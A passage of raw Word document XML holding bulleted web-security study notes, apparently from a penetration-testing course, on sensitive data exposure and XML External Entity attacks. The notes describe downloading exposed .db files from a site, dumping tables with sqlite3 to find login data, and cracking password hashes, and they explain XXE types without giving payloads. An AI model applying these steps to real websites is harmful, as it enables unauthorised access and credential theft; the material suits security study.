        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4BF5A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Accidentally divulge sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481D86E2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>PII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCC65DE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>May involve MiTM attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CC05A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>May rely solely on web app vulnerabilities and directly on web server itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1C1A35" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>It is common to store large amounts of data in a database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4326311B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Web application use – SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B36A816" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Databases set up on dedicated servers or files (flat-file databases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADB0E36" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Flat-file databases are stored on a single file on the computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BD0CA0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sometimes stored within root directory of the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9A3C41" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If accessible by a website user, it can be downloaded and queried on own machine, with full access to everything on database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B065344" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Flat-file database syntax and format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB546BF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Format is commonly sqlite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1167EEB9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Interacted with many programming languages and has a dedicated client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3DE0CF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE6487A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Syntax: sqlite3 &lt;database-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70776402" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>.tables command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F448BF3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To dump data from table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9C06B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>PRAGMA table_info(customers);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3817AC3A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SELECT * FROM customer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F370183" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If something like password hashes are found, Kali has tools for crack them or use online Crackstation – good for weak password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C41F3A0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Inspect element for developer notes in source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C36D7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If directory found, input in URL at end of IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0040975F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search for .db database files, download and use sqlite3 to search for information to login to web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FBD301" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>XML External Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDAAFBE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Abuses features of XML parsers/data, allows attacker to interact with any backend or external systems that application can access and allow files to be read on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03950736" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Also cause DoS or SSRF, port scanning and remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07424769" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Two Types of XXE Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA41BE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>In-band – attacker can receive an immediate response to XXE payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878CB26" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Out-of-band – blind XXE – no immediate response from web application and attacker has to reflect the output of their XXE payload to some other file or own server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D164253" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>XML External Entity – eXtensible Markup Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FB5BF8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What is XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B040F8F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Markup language that defines a set of rules for encoding documents in format both human and machine readable for storing/transporting data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D5D250" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Why is XML used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F24085" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Platform-independent, language-independent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A21904" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Data stored/transported using XML can be changed at any point in time without affect presentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A67B1B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Allows validation using DTD and Schema – free from syntax error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CD8DAF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Simplifies data sharing between various systems – no conversion required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC12201" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08425962" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>XML prolog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BAFFB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;?xml version=”1.0” encoding=”UTF-8”?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624B36E7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Above the line is called XML prolog and specifies XML version and encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A862C88" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Must contain root element – XML document will be invalid without</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08675DD6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Can use attributes as in HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00879B1C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>XML External Entity – DTD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5635C5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Document Type Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F59B40A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Defines structure and legal elements/attributes of XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5CB12F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
